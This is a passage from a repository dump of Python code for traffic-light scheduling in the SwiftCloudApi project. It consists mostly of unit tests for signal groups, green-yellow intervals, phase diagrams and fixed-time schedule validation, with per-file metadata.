to or following the green interval. 
For example,\n in the Netherlands the greenyellow interval would consist of the green interval followed by a yellow interval.\n In the UK, this greenyellow interval would consist of a yellow-red interval, followed by a green interval,\n succeeded by a yellow interval.\n \"\"\"\n\n def __init__(self, start_greenyellow: float, end_greenyellow: float) -> None:\n # by converting to the correct data type we ensure correct types are used\n self.start_greenyellow = float(start_greenyellow)\n self.end_greenyellow = float(end_greenyellow)\n assert start_greenyellow >= -EPSILON, \"start_greenyellow should be non-negative\"\n assert end_greenyellow >= -EPSILON, \"end_greenyellow should be non-negative\"\n\n def to_json(self) -> List:\n \"\"\"get json serializable structure that can be stored as json with json.dumps()\"\"\"\n return [self.start_greenyellow, self.end_greenyellow]\n\n @staticmethod\n def from_json(greenyellow_interval_list: List) -> GreenYellowInterval:\n \"\"\"Loading greenyellow interval from json (expected same json structure as generated with to_json)\"\"\"\n return GreenYellowInterval(*greenyellow_interval_list)\n\n def __eq__(self, greenyellow_interval: GreenYellowInterval):\n if not isinstance(greenyellow_interval, GreenYellowInterval):\n raise ValueError(\"can only compare a GreenYellowInterval to a GreenYellowInterval\")\n if greenyellow_interval.start_greenyellow == self.start_greenyellow and \\\n greenyellow_interval.end_greenyellow == self.end_greenyellow:\n return True\n else:\n return False\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n return f\"[{self.start_greenyellow:.2f}, {self.end_greenyellow:.2f}]\"\n"
},
{
"alpha_fraction": 0.6599915623664856,
"alphanum_fraction": 0.6833895444869995,
"avg_line_length": 48.93684387207031,
"blob_id": "8b3e357c9c904fd3590ccb3e25422f6f00377d7f",
"content_id": "43c8005d6006a9e89d1e3b2d5a45390b0685d136",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4744,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 95,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_completeness.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import List, Optional\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.validate_safety_restrictions.validate_completeness import validate_completeness\n\n\nclass TestValidatingCompleteness(unittest.TestCase):\n \"\"\" Unittests of the function find_other_sg_relation_matches \"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n @staticmethod\n def get_default_intersection(additional_signalgroups: Optional[List[SignalGroup]] = None\n ) -> Intersection:\n \"\"\"\n Get a default intersection object with 2 conflicting signal groups \"sg1\" and \"sg2\"\n :param additional_signalgroups: signal groups to add to the intersection (besides signal group 'sg1' and 'sg2')\n (besides the conflict between signal group 'sg1' and 'sg2')\n :return: the intersection object\n \"\"\"\n if additional_signalgroups is None:\n additional_signalgroups = []\n\n signalgroup1 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2] + additional_signalgroups,\n conflicts=[conflict])\n\n return intersection\n\n def test_complete(self) -> None:\n # WHEN\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n intersection = TestValidatingCompleteness.get_default_intersection()\n\n # WHEN\n validate_completeness(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_signalgroup_missing(self) -> None:\n # WHEN\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n signalgroup3 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg3\")\n intersection = TestValidatingCompleteness.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN\n validate_completeness(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_no_greenyellow_intervals(self) -> None:\n # WHEN\n fts = 
FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)],\n sg3=[]),\n period=100)\n signalgroup3 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg3\")\n intersection = TestValidatingCompleteness.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN\n validate_completeness(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n"
},
{
"alpha_fraction": 0.6059634685516357,
"alphanum_fraction": 0.6094902157783508,
"avg_line_length": 38.481014251708984,
"blob_id": "e6f228f5a31367f3b8e61e549f5812aaeb16b600",
"content_id": "cff70288f840863d2d2142005a26c7017cb8e008",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3119,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 79,
"path": "/swift_cloud_py/entities/intersection/test/test_traffic_light.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for TrafficLight() \"\"\"\n return dict(capacity=1800, lost_time=1, weight=1, max_saturation=1)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing TrafficLight object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n TrafficLight(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_type(self) -> None:\n \"\"\" Test providing the wrong type \"\"\"\n\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 'string' # all arguments are numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the traffic light\n TrafficLight(**input_dict)\n\n # THEN an error should be raised\n\n def test_negativity(self) -> None:\n \"\"\" Test providing negative values for capacity, lost_time, weight and max_saturation\"\"\"\n\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = -0.1 # all arguments are non-negative numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the traffic light\n TrafficLight(**input_dict)\n\n # THEN an error should be raised\n\n def test_zero(self) -> None:\n \"\"\" Test providing zero values for capacity and max_saturation \"\"\"\n\n for key in [\"capacity\", \"max_saturation\"]:\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 0.0 # argument should be positive\n with self.assertRaises(ValueError):\n # WHEN initializing the traffic light\n TrafficLight(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" Test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n traffic_light = TrafficLight(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n traffic_light_dict = traffic_light.to_json()\n traffic_light_from_json = TrafficLight.from_json(traffic_light_dict=traffic_light_dict)\n self.assertDictEqual(traffic_light_dict, traffic_light_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6240085959434509,
"alphanum_fraction": 0.6306537985801697,
"avg_line_length": 36.92683029174805,
"blob_id": "8a82b80523b9bc62c4af18464b8247f3dc813d0c",
"content_id": "7a6dd2fa329bfd4c82d1ee6ab4f87bf7cbf73bac",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4665,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 123,
"path": "/swift_cloud_py/entities/control_output/test/test_phase_diagram.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.control_output.phase_diagram import GreenYellowPhase, Phase, PhaseDiagram\n\n\nclass TestGreenYellowPhaseInputValidation(unittest.TestCase):\n\n def test_correct_input(self):\n \"\"\" Test initialization is correct with correct input\"\"\"\n # WHEN\n gy_phase = GreenYellowPhase(signalgroup_id=\"sg\", interval_index=0)\n\n # THEN\n self.assertEqual(gy_phase.signalgroup_id, \"sg\")\n self.assertEqual(gy_phase.interval_index, 0)\n\n def test_id_no_string(self):\n \"\"\" Test id is converted to string \"\"\"\n # WHEN\n # noinspection PyTypeChecker\n greenyellow_phase = GreenYellowPhase(signalgroup_id=1, interval_index=0)\n\n # THEN signalgroup_id should be converted to string\n self.assertIsInstance(greenyellow_phase.signalgroup_id, str)\n\n def test_index_no_int(self):\n \"\"\" Test constructing object fails if the index has the wrong datatype\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=\"wrong\")\n\n # THEN an error should be raised\n\n\nclass TestPhaseInputValidation(unittest.TestCase):\n\n def test_correct_input(self):\n \"\"\" Test initialization is correct with correct input\"\"\"\n # WHEN\n phase = Phase(greenyellow_phases=[GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=1),\n GreenYellowPhase(signalgroup_id=\"sg2\", interval_index=0)])\n\n # THEN\n self.assertEqual(phase.greenyellow_phases[0].signalgroup_id, \"sg1\")\n self.assertEqual(phase.greenyellow_phases[1].signalgroup_id, \"sg2\")\n self.assertEqual(phase.greenyellow_phases[0].interval_index, 1)\n self.assertEqual(phase.greenyellow_phases[1].interval_index, 0)\n\n def test_input_no_list(self):\n \"\"\" Test wrong input type (not a list)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n Phase(greenyellow_phases=1)\n\n # THEN an error should be raised\n\n def test_input_no_correct_list(self):\n \"\"\" Test wrong input type (not a list of GreenYellowPhase-objects)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n Phase(greenyellow_phases=[1, 2, 3])\n\n # THEN an error should be raised\n\n\nclass TestPhaseDiagramInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(phases=[Phase(greenyellow_phases=[GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=1),\n GreenYellowPhase(signalgroup_id=\"sg2\", interval_index=0)]),\n Phase(greenyellow_phases=[GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=1),\n GreenYellowPhase(signalgroup_id=\"sg2\", interval_index=0)]\n )])\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with correct input \"\"\"\n # GIVEN\n input_dict = TestPhaseDiagramInputValidation.get_default_inputs()\n\n # WHEN\n PhaseDiagram(**input_dict)\n\n # THEN no error should be raised\n\n def test_input_no_list(self):\n \"\"\" Test wrong input type (not a list)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n PhaseDiagram(phases=1)\n\n # THEN an error should be raised\n\n def test_input_no_correct_list(self):\n \"\"\" Test wrong input type (not a list of GreenYellowPhase-objects)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n PhaseDiagram(phases=1)\n\n # THEN an error should be raised\n\n\nclass 
TestFTSJsonConversion(unittest.TestCase):\n\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestPhaseDiagramInputValidation.get_default_inputs()\n\n # WHEN\n phase_diagram = PhaseDiagram(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n phase_lists = phase_diagram.to_json()\n phase_diagram_from_json = PhaseDiagram.from_json(phase_lists=phase_lists)\n self.assertListEqual(phase_lists, phase_diagram_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6036489605903625,
"alphanum_fraction": 0.6209271550178528,
"avg_line_length": 45.32276153564453,
"blob_id": "5a8b2eac193505c25d844010ab08f2c9726b5f41",
"content_id": "b5af21c2e85c3ae82377c25a3af704c863c2a234",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24829,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 536,
"path": "/swift_cloud_py/entities/control_output/test/test_fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import GreenYellowInterval, FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestIntervalInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(start_greenyellow=82, end_greenyellow=1)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with correct input \"\"\"\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n\n # WHEN\n GreenYellowInterval(**input_dict)\n\n # THEN no error should be raised\n\n def test_not_a_number(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with non-numeric arguments \"\"\"\n for key in TestIntervalInputValidation.get_default_inputs():\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n input_dict[key] = \"str\" # each argument should be a number\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n GreenYellowInterval(**input_dict)\n\n # THEN an error should be raised\n\n def test_negative(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with negative start_greenyellow or end_greenyellow\"\"\"\n for key in TestIntervalInputValidation.get_default_inputs():\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n input_dict[key] = -1 # should be positive\n\n with self.assertRaises(AssertionError):\n # WHEN initializing the queue lengths\n GreenYellowInterval(**input_dict)\n\n # THEN an error should be raised\n\n def test_comparing_success(self):\n \"\"\" Test comparing two of the same greenyellow intervals\"\"\"\n # GIVEN\n greenyellow1 = GreenYellowInterval(start_greenyellow=10, end_greenyellow=35)\n greenyellow2 = GreenYellowInterval(start_greenyellow=10, end_greenyellow=35)\n\n # WHEN\n same = greenyellow1 == greenyellow2\n\n # THEN\n self.assertTrue(same)\n\n def test_comparing_failure(self):\n \"\"\" Test comparing two different greenyellow intervals\"\"\"\n # GIVEN\n greenyellow1 = GreenYellowInterval(start_greenyellow=10, end_greenyellow=35)\n greenyellow2 = GreenYellowInterval(start_greenyellow=11, end_greenyellow=35)\n\n # WHEN\n same = greenyellow1 == greenyellow2\n\n # THEN\n self.assertEqual(same, False)\n\n\nclass TestIntervalJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n\n # WHEN\n greenyellow_interval = GreenYellowInterval(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n greenyellow_interval_list = greenyellow_interval.to_json()\n greenyellow_interval_from_json = GreenYellowInterval.from_json(\n greenyellow_interval_list=greenyellow_interval_list)\n self.assertListEqual(greenyellow_interval_list, greenyellow_interval_from_json.to_json())\n\n\nclass TestFTSInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=82, end_greenyellow=1),\n GreenYellowInterval(start_greenyellow=10, 
end_greenyellow=30)],\n sg2=[GreenYellowInterval(start_greenyellow=3, end_greenyellow=20)]),\n period=100)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with correct input \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n\n # WHEN\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_no_dict(self) -> None:\n \"\"\" Test providing no dictionary for greenyellow_intervals\"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"] = 1\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_string_values(self) -> None:\n \"\"\" Test providing no string for each id in greenyellow_intervals\"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"][1] = [1, 2] # add value (1) which is not a string\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_list_for_intervals(self) -> None:\n \"\"\" Test providing no list for the values in greenyellow_intervals\"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"][\"id3\"] = 1 # rates is not a list\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_rate_no_greenyellow_interval(self) -> None:\n \"\"\" Test providing no GreenYellowInterval for the interval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"][\"id3\"] = [GreenYellowInterval(start_greenyellow=1, end_greenyellow=10),\n \"3\"]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_times_exceeding_period_duration(self) -> None:\n \"\"\" Test providing no GreenYellowInterval for the interval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for time in [\"start_greenyellow\", \"end_greenyellow\"]:\n with self.subTest(f\"{time} exceeding period duration\"):\n greenyellow_interval_dict = dict(start_greenyellow=1, end_greenyellow=10)\n greenyellow_interval_dict[time] = input_dict[\"period\"] + 1\n input_dict[\"greenyellow_intervals\"][\"id3\"] = [GreenYellowInterval(**greenyellow_interval_dict)]\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_correct_order(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the correct periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error 
should be raised\n\n def test_correct_order2(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the correct periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_wrong_order(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the wrong periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_wrong_order2(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the wrong periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_not_overlapping(self) -> None:\n \"\"\" Test providing non-overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=20, end_greenyellow=40)] # at the verge of overlap\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_not_overlapping2(self) -> None:\n \"\"\" Test providing non-overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in 
range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=20, end_greenyellow=40)] # at the verge of overlap\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_overlapping(self) -> None:\n \"\"\" Test providing overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=15, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_overlapping2(self) -> None:\n \"\"\" Test providing overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=15, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_comparing_success(self):\n \"\"\" Test comparing two equal fixed-time schedules \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertTrue(same)\n\n def test_comparing_different_period(self):\n \"\"\" Test comparing two different fixed-time schedules (different period) \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n input_dict2[\"period\"] = input_dict[\"period\"] * 2\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertEqual(same, False)\n\n def test_comparing_different_ids(self):\n \"\"\" Test comparing two different fixed-time schedules (different ids) \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n input_dict2[\"greenyellow_intervals\"][\"sg3\"] = input_dict2[\"greenyellow_intervals\"][\"sg2\"]\n del input_dict2[\"greenyellow_intervals\"][\"sg2\"]\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = 
FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertEqual(same, False)\n\n def test_comparing_different_greenyellow_intervals(self):\n \"\"\" Test comparing two different fixed-time schedules (different greenyellow intervals) \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n input_dict2[\"greenyellow_intervals\"][\"sg2\"][0] = GreenYellowInterval(start_greenyellow=13, end_greenyellow=23)\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertEqual(same, False)\n\n\nclass TestFTSMethods(unittest.TestCase):\n @staticmethod\n def get_default_fts_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for FixedTimeSchedule() \"\"\"\n return dict(greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=82, end_greenyellow=1),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)],\n sg2=[GreenYellowInterval(start_greenyellow=3, end_greenyellow=20)]),\n period=100)\n\n def test_retrieving_greenyellow_intervals(self):\n \"\"\" test retrieving all greenyellow intervals of a signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # THEN\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg1), input_dict[\"greenyellow_intervals\"][\"sg1\"])\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg2), input_dict[\"greenyellow_intervals\"][\"sg2\"])\n\n def test_retrieving_greenyellow_intervals_by_id(self):\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", 